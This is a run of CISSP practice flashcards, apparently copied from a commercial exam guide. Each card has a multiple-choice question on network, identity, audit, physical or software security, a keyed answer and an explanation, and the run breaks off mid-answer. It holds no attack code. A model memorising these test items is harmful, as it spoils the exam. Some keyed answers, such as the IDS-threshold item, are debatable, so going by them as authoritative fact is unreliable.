Tom’s company has been experiencing many issues with unauthorized sniffers being installed on the network. One reason is because employees can plug their laptops, smartphones, and other mobile devices into the network, any of which may be infected and have a running sniffer that the owner is not aware of. Implementing VPNs will not work because all of the network devices would need to be configured for specific VPNs, and some devices, as in their switches, do not have this type of functionality available. Another issue Tom’s team is dealing with is how to secure internal wireless traffic. While the wireless access points can be configured with digital certificates for authentication, pushing out and maintaining certificates on each wireless user device is cost prohibitive and will place too much of a burden on the network team. Tom’s boss has also told him that the company needs to move from a landline metropolitan area network solution to a wireless solution.

Which of the following solutions is best to meet the company’s need to protect wireless traffic?

A. EAP-TLS

B. EAP-PEAP

C. LEAP

D. EAP-TTLS

A

D. EAP-Tunneled Transport Layer Security (EAP-TTLS) is an EAP protocol that extends TLS. EAP-TTLS is designed to provide authentication that is as strong as EAP-TLS, but it does not require that each wireless device be issued a certificate. Instead, only the authentication servers are issued certificates. User authentication is performed by password, but the password credentials are transported in a securely encrypted tunnel established based upon the server certificates.

57
Q

Lance has been brought in as a new security officer for a large medical equipment company. He has been told that many of the firewalls and IDS products have not been configured to filter IPv6 traffic; thus, many attacks have been taking place without the knowledge of the security team. While the network team has attempted to implement an automated tunneling feature to take care of this issue, they have continually run into problems with the network’s NAT device. Lance has also found out that caching attacks have been successful against the company’s public-facing DNS server. He has also identified that extra authentication is necessary for current LDAP requests, but the current technology only provides password-based authentication options.

Based upon the information in the scenario, what should the network team implement as it pertains to IPv6 tunneling? A. Teredo should be configured on IPv6-aware hosts that reside behind the NAT device. B. 6to4 should be configured on IPv6-aware hosts that reside behind the NAT device. C. Intra-Site Automatic Tunnel Addressing Protocol should be configured on IPv6-aware hosts that reside behind the NAT device. D. IPv6 should be disabled on all systems.

Harris, Shon. CISSP All-in-One Exam Guide, Eighth Edition (p. 725). McGraw-Hill Education. Kindle Edition.

A

A. Teredo encapsulates IPv6 packets within UDP datagrams with IPv4 addressing. IPv6-aware systems behind the NAT device can be used as Teredo tunnel endpoints even if they do not have a dedicated public IPv4 address.

Harris, Shon. CISSP All-in-One Exam Guide, Eighth Edition (p. 727). McGraw-Hill Education. Kindle Edition.

58
Q

Lance has been brought in as a new security officer for a large medical equipment company. He has been told that many of the firewalls and IDS products have not been configured to filter IPv6 traffic; thus, many attacks have been taking place without the knowledge of the security team. While the network team has attempted to implement an automated tunneling feature to take care of this issue, they have continually run into problems with the network’s NAT device. Lance has also found out that caching attacks have been successful against the company’s public-facing DNS server. He has also identified that extra authentication is necessary for current LDAP requests, but the current technology only provides password-based authentication options.

Which of the following is the best countermeasure for the attack type addressed in the scenario? A. DNSSEC B. IPSec C. Split server configurations D. Disabling zone transfers

Harris, Shon. CISSP All-in-One Exam Guide, Eighth Edition (p. 725). McGraw-Hill Education. Kindle Edition.

A

A. DNSSEC protects DNS servers from forged DNS information, which is commonly used to carry out DNS cache poisoning attacks. If DNSSEC is implemented, then all responses that the server receives will be verified through digital signatures. This helps ensure that an attacker cannot provide a DNS server with incorrect information, which would point the victim to a malicious website.

Harris, Shon. CISSP All-in-One Exam Guide, Eighth Edition (p. 727). McGraw-Hill Education. Kindle Edition.

59
Q

Lance has been brought in as a new security officer for a large medical equipment company. He has been told that many of the firewalls and IDS products have not been configured to filter IPv6 traffic; thus, many attacks have been taking place without the knowledge of the security team. While the network team has attempted to implement an automated tunneling feature to take care of this issue, they have continually run into problems with the network’s NAT device. Lance has also found out that caching attacks have been successful against the company’s public-facing DNS server. He has also identified that extra authentication is necessary for current LDAP requests, but the current technology only provides password-based authentication options.

Which of the following technologies should Lance’s team investigate for increased authentication efforts?

A. Challenge Handshake Authentication Protocol

B. Simple Authentication and Security Layer

C. IEEE 802.2AB

D. EAP-SSL

A

B. Simple Authentication and Security Layer is a protocol-independent authentication framework. This means that any protocol that knows how to interact with SASL can use its various authentication mechanisms without having to actually embed the authentication mechanisms within its code.

60
Q

Wireless LAN technologies have gone through different versions over the years to address some of the inherent security issues within the original IEEE 802.11 standard. Which of the following provides the correct characteristics of Wi-Fi Protected Access 2 (WPA2)?

A. IEEE 802.1X, WEP, MAC

B. IEEE 802.1X, EAP, TKIP

C. IEEE 802.1X, EAP, WEP

D. IEEE 802.1X, EAP, CCMP

A

D. Wi-Fi Protected Access 2 requires IEEE 802.1X or preshared keys for access control, EAP or preshared keys for authentication, and AES algorithm in counter mode with CBC-MAC Protocol (CCMP) for encryption.

61
Q

Alice wants to send a message to Bob, who is several network hops away from her. What is the best approach to protecting the confidentiality of the message?

A. PPTP

B. S/MIME

C. Link encryption

D. SSH

A

B. Secure Multipurpose Internet Mail Extensions (S/MIME) is a standard for encrypting and digitally signing e-mail and for providing secure data transmissions using public key infrastructure (PKI).

62
Q

Charlie uses PGP on his Linux-based e-mail client. His friend Dave uses S/MIME on his Windows-based e-mail. Charlie is unable to send an encrypted e-mail to Dave. What is the likely reason?

A. PGP and S/MIME are incompatible.

B. Each has a different secret key.

C. Each is using a different CA.

D. There is not enough information to determine the likely reason.

A

A. PGP uses a decentralized web of trust for its PKI, while S/MIME relies on centralized CAs. The two systems are, therefore, incompatible with each other.

63
Q

Which item is not part of a Kerberos authentication implementation?

A. Message authentication code

B. Ticket granting service

C. Authentication service

D. Users, programs, and services

A

A. Message authentication code (MAC) is a cryptographic function and is not a key component of Kerberos. Kerberos is made up of a KDC, a realm of principals (users, services, applications, and devices), an authentication service, tickets, and a ticket granting service.

64
Q

In discretionary access control security, who has delegation authority to grant access to data?

A. User

B. Security officer

C. Security policy

D. Owner

A

D. This question may seem a little confusing if you were stuck between user and owner. Only the data owner can decide who can access the resources she owns. She may or may not be a user. A user is not necessarily the owner of the resource. Only the actual owner of the resource can dictate what subjects can actually access the resource.

65
Q

Which of the following is the best description of directories that are used in identity management technology?

A. Most are hierarchical and follow the X.500 standard.

B. Most have a flat architecture and follow the X.400 standard.

C. Most have moved away from LDAP.

D. Many use LDAP.

A

A. Most enterprises have some type of directory that contains information pertaining to the company’s network resources and users. Most directories follow a hierarchical database format, based on the X.500 standard, and a type of protocol, as in Lightweight Directory Access Protocol (LDAP), that allows subjects and applications to interact with the directory. Applications can request information about a particular user by making an LDAP request to the directory, and users can request information about a specific resource by using a similar request.

66
Q

Which of the following is not considered an anomaly-based intrusion protection system?

A. Statistical anomaly–based

B. Protocol anomaly–based

C. Temporal anomaly–based

D. Traffic anomaly–based

A

C. An anomaly-based IPS is a behavioral-based system that learns the “normal” activities of an environment. The three types are listed next:

  • Statistical anomaly–based Creates a profile of “normal” and compares activities to this profile
  • Protocol anomaly–based Identifies protocols used outside of their common bounds
  • Traffic anomaly–based Identifies unusual activity in network traffic
67
Q

George is responsible for setting and tuning the thresholds for his company’s behavior-based IDS. Which of the following outlines the possibilities of not doing this activity properly?

A. If the threshold is set too low, nonintrusive activities are considered attacks (false positives). If the threshold is set too high, malicious activities are not identified (false negatives).

B. If the threshold is set too low, nonintrusive activities are considered attacks (false negatives). If the threshold is set too high, malicious activities are not identified (false positives).

C. If the threshold is set too high, nonintrusive activities are considered attacks (false positives). If the threshold is set too low, malicious activities are not identified (false negatives).

D. If the threshold is set too high, nonintrusive activities are considered attacks (false positives). If the threshold is set too high, malicious activities are not identified (false negatives).

A

C. If the threshold is set too high, nonintrusive activities are considered attacks (false positives). If the threshold is set too low, malicious activities are not identified (false negatives).

68
Q

Tom is a new security manager for a retail company, which currently has an identity management system (IdM) in place. The data within the various identity stores updates more quickly than the current IdM software can keep up with, so some access decisions are made based upon obsolete information. While the IdM currently provides centralized access control of internal network assets, it is not tied into the web-based access control components that are embedded within the company’s partner portals. Tom also notices that help-desk technicians are spending too much time resetting passwords for internal employees.

Which of the following changes would be best for Tom’s team to implement?

A. Move from namespaces to distinguished names.

B. Move from meta-directories to virtual directories.

C. Move from RADIUS to TACACS+.

D. Move from a centralized to a decentralized control model.

A

B. A meta-directory within an IdM physically contains the identity information within an identity store. It allows identity information to be pulled from various locations and be stored in one local system (identity store). The data within the identity store is updated through a replication process, which may take place weekly, daily, or hourly depending upon configuration. Virtual directories use pointers to where the identity data resides on the original system; thus, no replication processes are necessary. Virtual directories usually provide the most up-to-date identity information since they point to the original source of the data.

69
Q

Tom is a new security manager for a retail company, which currently has an identity management system (IdM) in place. The data within the various identity stores updates more quickly than the current IdM software can keep up with, so some access decisions are made based upon obsolete information. While the IdM currently provides centralized access control of internal network assets, it is not tied into the web-based access control components that are embedded within the company’s partner portals. Tom also notices that help-desk technicians are spending too much time resetting passwords for internal employees.

Which of the following components should Tom make sure his team puts into place?

A. Single sign-on module

B. LDAP directory service synchronization

C. Web access management

D. X.500 database

A

C. Web access management (WAM) is a component of most IdM products that allows for identity management of web-based activities to be integrated and managed centrally.

70
Q

Lenny is a new security manager for a retail company that is expanding its functionality to its partners and customers. The company’s CEO wants to allow its partners’ customers to be able to purchase items through the company’s web stores as easily as possible. The CEO also wants the company’s partners to be able to manage inventory across companies more easily. The CEO wants to be able to understand the network traffic and activities in a holistic manner, and he wants to know from Lenny what type of technology should be put into place to allow for a more proactive approach to stopping malicious traffic if it enters the network. The company is a high-profile entity constantly dealing with zero-day attacks.

Lenny has a meeting with the internal software developers who are responsible for implementing the necessary functionality within the web-based system. Which of the following best describes the two items that Lenny needs to be prepared to discuss with this team?

A. Service Provisioning Markup Language and the Extensible Access Control Markup Language

B. Standard Generalized Markup Language and the Generalized Markup Language

C. Extensible Markup Language and the Hypertext Markup Language

D. Service Provisioning Markup Language and the Generalized Markup Language

A

A. The Service Provisioning Markup Language (SPML) allows company interfaces to pass service requests, and the receiving company provisions (allows) access to these services. Both the sending and receiving companies need to be following the XML standard, which will allow this type of interoperability to take place. When using the Extensible Access Control Markup Language (XACML), application security policies can be shared with other applications to ensure that both are following the same security rules. The developers need to integrate both of these language types to allow for their partner employees to interact with their inventory systems without having to conduct a second authentication step. The use of the languages can reduce the complexity of inventory control between the different companies.

71
Q

Lenny is a new security manager for a retail company that is expanding its functionality to its partners and customers. The company’s CEO wants to allow its partners’ customers to be able to purchase items through the company’s web stores as easily as possible. The CEO also wants the company’s partners to be able to manage inventory across companies more easily. The CEO wants to be able to understand the network traffic and activities in a holistic manner, and he wants to know from Lenny what type of technology should be put into place to allow for a more proactive approach to stopping malicious traffic if it enters the network. The company is a high-profile entity constantly dealing with zero-day attacks.

Pertaining to the CEO’s security concerns, what should Lenny suggest the company put into place?

A. Security event management software, an intrusion prevention system, and behavior-based intrusion detection

B. Security information and event management software, an intrusion detection system, and signature-based protection

C. An intrusion prevention system, security event management software, and malware protection

D. An intrusion prevention system, security event management software, and war-dialing protection

A

A. Security event management software allows for network traffic to be viewed holistically by gathering log data centrally and analyzing it. The intrusion prevention system allows for proactive measures to be put into place to help in stopping malicious traffic from entering the network. Behavior-based intrusion detection can identify new types of attacks (zero day) compared to signature-based intrusion detection.

72
Q

Robbie is the security administrator of a company that needs to extend its remote access functionality. Employees travel around the world, but still need to be able to gain access to corporate assets such as databases, servers, and network-based devices. Also, while the company has had a VoIP telephony solution in place for two years, it has not been integrated into a centralized access control solution. Currently the network administrators have to maintain access control separately for internal resources, external entities, and VoIP end systems. Robbie has also been asked to look into some suspicious e-mails that the CIO’s secretary has been receiving, and her boss has asked her to remove some old modems that are no longer being used for remote dial-in purposes.

Which of the following is the best remote access technology for this situation?

A. RADIUS

B. TACACS+

C. Diameter

D. Kerberos

A

C. The Diameter protocol extends the RADIUS protocol to allow for various types of authentication to take place with a variety of different technologies (PPP, VoIP, Ethernet, etc.). It has extensive flexibility and allows for the centralized administration of access control.

73
Q

Robbie is the security administrator of a company that needs to extend its remote access functionality. Employees travel around the world, but still need to be able to gain access to corporate assets such as databases, servers, and network-based devices. Also, while the company has had a VoIP telephony solution in place for two years, it has not been integrated into a centralized access control solution. Currently the network administrators have to maintain access control separately for internal resources, external entities, and VoIP end systems. Robbie has also been asked to look into some suspicious e-mails that the CIO’s secretary has been receiving, and her boss has asked her to remove some old modems that are no longer being used for remote dial-in purposes.

What are the two main security concerns Robbie is most likely being asked to identify and mitigate?

A. Social engineering and spear-phishing

B. War dialing and pharming

C. Spear-phishing and war dialing

D. Pharming and spear-phishing

A

C. Spear-phishing is a targeted social engineering attack, which is what the CIO’s secretary is most likely experiencing. War dialing is a brute-force attack against devices that use phone numbers, as in modems. If the modems can be removed, the risk of war-dialing attacks decreases.

74
Q

Tanya is working with the company’s internal software development team. Before a user of an application can access files located on the company’s centralized server, the user must present a valid one-time password, which is generated through a challenge/response mechanism. The company needs to tighten access control for these files and reduce the number of users who can access each and every file. The company is looking to Tanya and her team for solutions to better protect the data that has been classified and deemed critical to the company’s missions. Tanya has also been asked to implement a single sign-on technology for all internal users, but she does not have the budget to implement a public key infrastructure.

Which of the following best describes what is currently in place?

A. Capability-based access system

B. Synchronous tokens that generate one-time passwords

C. RADIUS

D. Kerberos

A

A. A capability-based access control system means that the subject (user) has to present something, which outlines what it can access. The item can be a ticket, token, or key. A capability is tied to the subject for access control purposes. A synchronous token is not being used, because the scenario specifically states that a challenge\response mechanism is being used, which indicates an asynchronous token.

75
Q

Tanya is working with the company’s internal software development team. Before a user of an application can access files located on the company’s centralized server, the user must present a valid one-time password, which is generated through a challenge/response mechanism. The company needs to tighten access control for these files and reduce the number of users who can access each and every file. The company is looking to Tanya and her team for solutions to better protect the data that has been classified and deemed critical to the company’s missions. Tanya has also been asked to implement a single sign-on technology for all internal users, but she does not have the budget to implement a public key infrastructure.

Which of the following is the best single sign-on technology for this situation?

A. PKI

B. Kerberos

C. RADIUS

D. TACACS+

A

B. The scenario specifies that PKI cannot be used, so the first option is not correct. Kerberos is based upon symmetric cryptography; thus, it does not need a PKI. RADIUS and TACACS+ are remote centralized access control protocols.

76
Q

Harry is overseeing a team that has to integrate various business services provided by different company departments into one web portal for both internal employees and external partners. His company has a diverse and heterogeneous environment with different types of systems providing customer relationship management, inventory control, e-mail, and help-desk ticketing capabilities. His team needs to allow different users access to these different services in a secure manner.

Which of the following best describes the types of languages and/or protocols that Harry needs to ensure are implemented?

A. Security Assertion Markup Language, Extensible Access Control Markup Language, Service Provisioning Markup Language

B. Service Provisioning Markup Language, Simple Object Access Protocol, Extensible Access Control Markup Language

C. Extensible Access Control Markup Language, Security Assertion Markup Language, Simple Object Access Protocol

D. Service Provisioning Markup Language, Security Association Markup Language

A

C. The most appropriate languages and protocols for the purpose laid out in the scenario are Extensible Access Control Markup Language, Security Assertion Markup Language, and Simple Object Access Protocol. Harry’s group is not necessarily overseeing account provisioning, so the Service Provisioning Markup Language is not necessary, and there is no language called “Security Association Markup Language.”

77
Q

Harry is overseeing a team that has to integrate various business services provided by different company departments into one web portal for both internal employees and external partners. His company has a diverse and heterogeneous environment with different types of systems providing customer relationship management, inventory control, e-mail, and help-desk ticketing capabilities. His team needs to allow different users access to these different services in a secure manner.

The company’s partners need to integrate compatible authentication functionality into their web portals to allow for interoperability across the different company boundaries. Which of the following will deal with this issue?

A. Service Provisioning Markup Language

B. Simple Object Access Protocol

C. Extensible Access Control Markup Language

D. Security Assertion Markup Language

A

D. Security Assertion Markup Language allows the exchange of authentication and authorization data to be shared between security domains. It is one of the most commonly used approaches to allow for single sign-on capabilities within a web-based environment.

78
Q

Internal audits are the preferred approach when which of the following is true?

A. The organization lacks the organic expertise to conduct them.

B. Regulatory requirements dictate the use of a third-party auditor.

C. The budget for security testing is limited or nonexistent.

D. There is concern over the spillage of proprietary or confidential information.

A

C. Third-party auditors are almost always fairly expensive, so if the organization’s budget does not support their use, it may be necessary to use internal assets to conduct the audit.

79
Q

Choose the term that describes an audit performed to demonstrate that an organization is complying with its contractual obligations to another organization.

A. Internal audit

B. Third-party audit

C. External audit

D. Compliance audit

A

C. External audits are used to ensure that contractors are meeting their contractual obligations, so that is the best answer. A compliance audit would apply to regulatory or industry standards and would almost certainly be a third-party audit, which makes answer D a poor fit in most cases.

80
Q

An assessment whose goal is to assess the susceptibility of an organization to social engineering attacks is best classified as

A. Physical testing

B. Personnel testing

C. Vulnerability testing

D. Network testing

A

B. Social engineering is focused on people, so personnel testing is the best answer.

81
Q

Security event logs can best be protected from tampering by which of the following?

A. Encrypting the contents using asymmetric key encryption

B. Ensuring every user has administrative rights on their own workstations

C. Using remote logging over simplex communications media

D. Storing the event logs on DVD-RW

A

C. Using a remote logging host raises the bar for attackers because if they are able to compromise one host, they would have to compromise the remote logger in order to tamper with the logs. The use of a simplex channel further hinders the attackers.

82
Q

Synthetic transactions are best described as

A. Real user monitoring (RUM)

B. Transactions that fall outside the normal purpose of a system

C. Transactions that are synthesized from multiple users’ interactions with the system

D. A way to test the behavior and performance of critical services

A

D. Synthetic transactions are those that simulate the behavior of real users, but are not the result of real user interactions with the system. They allow an organization to ensure that services are behaving properly without having to rely on user complaints to detect problems

83
Q

One of the actions that attackers typically attempt after compromising a system is to acquire the ability to mimic a normal privileged user. What is one way in which they may accomplish this?

A. Rebooting the compromised host

B. Exporting the password hash table

C. Pivoting from the compromised host to another target

D. Adding a privileged user account

A

D. After compromising a host, attackers may attempt a number of actions, but will typically attempt to blend in by acquiring administrative privileges. They can do this by either compromising a privileged account, adding a privileged account, or elevating the privileges of the account they compromised.

84
Q

Which of the following is not normally an element of user accounts management audits?

A. Password hashing

B. Signed AUPs

C. Privileged accounts

D. Suspended accounts

A

A. Password hashing (covered in Chapter 5) is a very common approach to protecting user account passwords, but varies from one platform to the next. It is almost always controlled by the system itself and would normally not be part of the user accounts management audit.

85
Q

Which operating systems allows users to temporarily elevate their privileges in order to launch an application at a higher privilege level?

A. All major desktop operating systems

B. Recent versions of Windows

C. Linux and Windows

D. Recent versions of macOS

A

A. All major operating systems allow for the temporary elevation of user privileges, but macOS and some versions of Linux require the user to do so from a terminal window.

86
Q

Data backup verification efforts should

A. Have the smallest scope possible

B. Be based on the threats to the organization

C. Maximize impact on business

D. Focus on user data

A

B. The verification of data backups should focus on assessing the organization’s ability to respond to the threats identified during the threat modeling and risk management processes. If the organization can’t respond to these threats, then its backups may be useless.

87
Q

Which of the following is not a form of social engineering?

A. Pretexting

B. Fishing

C. Whaling

D. Blackmailing

A

B. The correct term for social engineering conducted over digital communications means is phishing, not fishing.

88
Q

Which of the following is true about key risk indicators (KRIs)?

A. They tell managers where an organization stands with regard to its goals.

B. They are inputs to the calculation of single loss expectancy (SLE).

C. They tell managers where an organization stands with regard to its risk appetite.

D. An interpretation of one or more metrics that describes the effectiveness of the ISMS.

A

C. Key risk indicators (KRIs) allow managers to understand when specific activities of the organization are moving it toward a higher level of risk. They are useful to understanding changes and managing the overall risk.

89
Q

Which of the following is true of management reviews?

A. They happen periodically and include results of audits as a key input.

B. They happen in an ad hoc manner as the needs of the organization dictate.

C. They are normally conducted by mid-level managers, but their reports are presented to the key business leaders.

D. They are focused on assessing the management of the information systems.

A

A. Management reviews work best when they are regularly scheduled events involving the key organizational leaders, because this allows the subordinate leaders to plan and conduct the assessments, such as audits that provide inputs to the review.

90
Q

Which of the following is not true about continuous monitoring?

A. It involves ad hoc processes that provide agility in responding to novel attacks.

B. Its main goal is to support organizational risk management.

C. It helps determine whether security controls remain effective.

D. It relies on carefully chosen metrics and measurements.

A

A. Continuous monitoring is a deliberate, data-driven process supporting organizational risk management. One of the key questions it answers is: are controls still effective at mitigating risks? Continuous monitoring could potentially lead to a decision to implement specific ad hoc processes, but these would not really be part of continuous monitoring.

91
Q

A company needs to implement a CCTV system that will monitor a large area outside the facility. Which of the following is the correct lens combination for this?

A. A wide-angle lens and a small lens opening

B. A wide-angle lens and a large lens opening

C. A wide-angle lens and a large lens opening with a small focal length

D. A wide-angle lens and a large lens opening with a large focal length

A

A. The depth of field refers to the portion of the environment that is in focus when shown on the monitor. The depth of field varies depending upon the size of the lens opening, the distance of the object being focused on, and the focal length of the lens. The depth of field increases as the size of the lens opening decreases, the subject distance increases, or the focal length of the lens decreases. So if you want to cover a large area and not focus on specific items, it is best to use a wide-angle lens and a small lens opening.

92
Q

Which of the following is not a true statement about CCTV lenses?

A. Lenses that have a manual iris should be used in outside monitoring.

B. Zoom lenses will carry out focus functionality automatically.

C. Depth of field increases as the size of the lens opening decreases.

D. Depth of field increases as the focal length of the lens decreases.

A

A. Manual iris lenses have a ring around the CCTV lens that can be manually turned and controlled. A lens that has a manual iris would be used in an area that has fixed lighting, since the iris cannot self-adjust to changes of light. An auto iris lens should be used in environments where the light changes, such as an outdoor setting. As the environment brightens, this is sensed by the iris, which automatically adjusts itself. Security personnel will configure the CCTV to have a specific fixed exposure value, which the iris is responsible for maintaining. The other answers are true.

93
Q

What is true about a transponder?

A. It is a card that can be read without sliding it through a card reader.

B. It is a biometric proximity device.

C. It is a card that a user swipes through a card reader to gain access to a facility.

D. It exchanges tokens with an authentication server.

A

A. A transponder is a type of physical access control device that does not require the user to slide a card through a reader. The reader and card communicate directly. The card and reader have a receiver, transmitter, and battery. The reader sends signals to the card to request information. The card sends the reader an access code.

94
Q

What are the two general types of proximity identification devices?

A. Biometric devices and access control devices

B. Swipe card devices and passive devices

C. Preset code devices and wireless devices

D. User-activated devices and system sensing devices

A

D. A user-activated device requires the user to do something: swipe the card through the reader and/or enter a code. A system sensing device recognizes the presence of the card and communicates with it without the user needing to carry out any activity.

95
Q

Which of the following best describes the difference between a warded lock and a tumbler lock?

A. A tumbler lock is more simplistic and easier to circumvent than a warded lock.

B. A tumbler lock uses an internal bolt, and a warded lock uses internal cylinders.

C. A tumbler lock has more components than a warded lock.

D. A warded lock is mainly used externally, and a tumbler lock is used internally.

A

C. The tumbler lock has more pieces and parts than a warded lock. The key fits into a cylinder, which raises the lock metal pieces to the correct height so the bolt can slide to the locked or unlocked position. A warded lock is easier to circumvent than a tumbler lock.

96
Q

All of the following are best practices for controlling the software that is installed and authorized to run in our systems except

A. Application whitelisting

B. Code reviews

C. Gold Masters

D. Least privilege

A

B. Code reviews are focused on finding and fixing defects in software that is undergoing development. It is not helpful in controlling which applications run on our computers.

97
Q

You come across an advanced piece of polymorphic malware that uses a custom communications protocol for network traffic. This protocol has a distinctive signature in its header. Which tool is best suited to mitigate this malware by preventing the packets from traversing the network?

A. Antimalware

B. Stateful firewall

C. Intrusion detection system (IDS)

D. Intrusion prevention system (IPS)

A

D. The intrusion prevention system is the best answer because these systems can stop packets containing specific signatures. Although some antimalware software might be able to this also, this functionality is not a universal feature in this sort of solution.

98
Q

Which of the following does not describe a reciprocal agreement?

A. The agreement is enforceable.

B. It is a cheap solution.

C. It may be able to be implemented right after a disaster.

D. It could overwhelm a current data processing site.

A

A. A reciprocal agreement is not enforceable, meaning that the company that agreed to let the damaged company work out of its facility can decide not to allow this to take place. A reciprocal agreement is a better secondary backup option if the original plan falls through.

99
Q

After a computer forensic investigator seizes a computer during a crime investigation, what is the next step?

A. Label and put it into a container, and then label the container

B. Dust the evidence for fingerprints

C. Make an image copy of the disks

D. Lock the evidence in the safe

A

C. Several steps need to be followed when gathering and extracting evidence from a scene. Once a computer has been confiscated, the first thing the computer forensics team should do is make an image of the hard drive. The team will work from this image instead of the original hard drive so that the original stays in a pristine state and the evidence on the drive is not accidentally corrupted or modified.

100
Q

Which of the following is a necessary characteristic of evidence for it to be admissible?

A. It must be real.

B. It must be noteworthy.

C. It must be reliable.

D. It must be important.

A

C. For evidence to be admissible, it must be relevant, complete, sufficient, and reliable to the case. For evidence to be reliable, it must be consistent with fact and must not be based on opinion or be circumstantial.

101
Q

On your first day in a new job, you are invited to a meeting with attorneys representing a company for which your company provides infrastructure services. You learn that there is a major investigation underway into allegations that one of your company’s system administrators improperly accessed mailboxes belonging to this client. Based on what you know so far, which type of investigation is this likeliest to be?

A. Administrative

B. Regulatory

C. Criminal

D. Civil

A

D. The allegations, depending on the details, could point to any of the four types of investigations. However, since you are meeting with attorneys representing this client, it is likeliest that they are considering (or taking) civil action against your company. None of the other three types of investigations would normally involve meetings with a client’s attorneys.

As an aside, in this situation you would obviously want to ensure that your own company’s attorneys were present too.

102
Q

A system has been patched many times and has recently become infected with a dangerous virus. If antimalware software indicates that disinfecting a file may damage it, what is the correct action?

A. Disinfect the file and contact the vendor

B. Back up the data and disinfect the file

C. Replace the file with the file saved the day before

D. Restore an uninfected version of the patched file from backup media.

A

D. Some files cannot be properly sanitized by the antivirus software without destroying them or affecting their functionality. So, the administrator must replace such a file with a known uninfected file. Plus, the administrator needs to make sure he has the patched version of the file, or else he could be introducing other problems. Answer C is not the best answer because the administrator may not know the file was clean yesterday, so just restoring yesterday’s file may put him right back in the same boat.

103
Q

What is the purpose of polyinstantiation?

A. To restrict lower-level subjects from accessing low-level information

B. To make a copy of an object and modify the attributes of the second copy

C. To create different objects that will react in different ways to the same input

D. To create different objects that will take on inheritance attributes from their class

A

B. Instantiation is what happens when an object is created from a class. Polyinstantiation is when more than one object is made and the other copy is modified to have different attributes. This can be done for several reasons. The example given in the chapter was a way to use polyinstantiation for security purposes to ensure that a lower-level subject could not access an object at a higher level.

104
Q

Which of the following techniques or set of techniques is used to deter database inference attacks?

A. Partitioning, cell suppression, and noise and perturbation

B. Controlling access to the data dictionary

C. Partitioning, cell suppression, and small query sets

D. Partitioning, noise and perturbation, and small query sets

A

A. Partitioning means to logically split the database into parts. Views then dictate which users can view specific parts. Cell suppression means that specific cells are not viewable by certain users. And noise and perturbation is when bogus information is inserted into the database to try to give potential attackers incorrect information.

105
Q

An online transaction processing (OLTP) system that detects an invalid transaction should do which of the following?

A. Roll back and rewrite over original data

B. Terminate all transactions until properly addressed

C. Write a report to be reviewed

D. Checkpoint each data entry

A

C. This can seem like a tricky question. It states that the system has detected an invalid transaction, which is most likely a user error. This error should be logged so it can be reviewed. After the review, the supervisor, or whoever makes this type of decision, will decide whether or not it was a mistake and, if so, investigate it as needed. If the system had a glitch, power fluctuation, hang-up, or any other software- or hardware-related error, it would not be an invalid transaction, and in that case the system would carry out a rollback function.

106
Q

Which of the following are rows and columns within relational databases?

A. Rows and tuples

B. Attributes and rows

C. Keys and views

D. Tuples and attributes

A

D. In a relational database, a row is referred to as a tuple, whereas a column is referred to as an attribute.

107
Q

Databases can record transactions in real time, which usually updates more than one database in a distributed environment. This type of complexity can introduce many integrity threats, so the database software should implement the characteristics of what’s known as the ACID test. Which of the following are incorrect characteristics of the ACID test?

i. Atomicity Divides transactions into units of work and ensures that all modifications take effect or none takes effect.
ii. Consistency A transaction must follow the integrity policy developed for that particular database and ensure all data is consistent in the different databases.
iii. Isolation Transactions execute in isolation until completed, without interacting with other transactions.
iv. Durability Once the transaction is verified as inaccurate on all systems, it is committed and the databases cannot be rolled back.

A. i, ii

B. ii. iii

C. ii, iv

D. iv

A

D. The following are correct characteristics of the ACID test:

  • Atomicity Divides transactions into units of work and ensures that all modifications take effect or none take effect. Either the changes are committed or the database is rolled back.
  • Consistency A transaction must follow the integrity policy developed for that particular database and ensure all data is consistent in the different databases.
  • Isolation Transactions execute in isolation until completed, without interacting with other transactions. The results of the modification are not available until the transaction is completed.
  • Durability Once the transaction is verified as accurate on all systems, it is committed and the databases cannot be rolled back.
108
Q

John is a manager of the application development department within his company. He needs to make sure his team is carrying out all of the correct testing types and at the right times of the development stages. Which of the following accurately describe types of software testing that should be carried out?

i. Unit testing Testing individual components in a controlled environment where programmers validate data structure, logic, and boundary conditions.
ii. Integration testing Verifying that components work together as outlined in design specifications.
iii. Acceptance testing Ensuring that the code meets customer requirements.
iv. Regression testing After a change to a system takes place, retesting to ensure functionality, performance, and protection.

A. i, ii

B. ii, iii

C. i, ii, iv

D. i, ii, iii, iv

A

D. There are different types of tests the software should go through because there are different potential flaws we will be looking for. The following are some of the most common testing approaches:

  • Unit testing Testing individual components in a controlled environment where programmers validate data structure, logic, and boundary conditions
  • Integration testing Verifying that components work together as outlined in design specifications
  • Acceptance testing Ensuring that the code meets customer requirements
  • Regression testing After a change to a system takes place, retesting to ensure functionality, performance, and protection
109
Q

Marge has to choose a software development methodology that her team should follow. The application that her team is responsible for developing is a critical application that can have few to no errors. Which of the following best describes the type of methodology her team should follow?

A. Cleanroom

B. Joint Analysis Development (JAD)

C. Rapid Application Development (RAD)

D. Reuse methodology

A

A. The listed software development methodologies and their definitions are as follows:

  • Joint Analysis Development (JAD) A methodology that uses a team approach in application development in a workshop-oriented environment.
  • Rapid Application Development (RAD) A methodology that combines the use of prototyping and iterative development procedures with the goal of accelerating the software development process.
  • Reuse methodology A methodology that approaches software development by using progressively developed code. Reusable programs are evolved by gradually modifying pre-existing prototypes to customer specifications. Since the reuse methodology does not require programs to be built from scratch, it drastically reduces both development cost and time.
  • Cleanroom An approach that attempts to prevent errors or mistakes by following structured and formal methods of developing and testing. This approach is used for high-quality and critical applications that will be put through a strict certification process.
110
Q

Which of the following is the second level of the Capability Maturity Model Integration?

A. Repeatable

B. Defined

C. Managed

D. Optimizing

A

A. The five levels of the Capability Maturity Integration Model are

  • Initial Development process is ad hoc or even chaotic. The company does not use effective management procedures and plans. There is no assurance of consistency, and quality is unpredictable. Success is usually the result of individual heroics.
  • Repeatable A formal management structure, change control, and quality assurance are in place. The company can properly repeat processes throughout each project. The company does not have formal process models defined.
  • Defined Formal procedures are in place that outline and define processes carried out in each project. The organization has a way to allow for quantitative process improvement.
  • Managed The company has formal processes in place to collect and analyze quantitative data, and metrics are defined and fed into the process-improvement program.
  • Optimizing The company has budgeted and integrated plans for continuous process improvement.
111
Q

One of the characteristics of object-oriented programming is deferred commitment. Which of the following is the best description for this characteristic?

A. The building blocks of software are autonomous objects, cooperating through the exchange of messages.

B. The internal components of an object can be redefined without changing other parts of the system.

C. Classes are reused by other programs, though they may be refined through inheritance.

D. Object-oriented analysis, design, and modeling map to business needs and solutions.

A

B. The characteristics and their associated definitions are listed as follows:

  • Modularity Autonomous objects, cooperation through exchanges of messages.
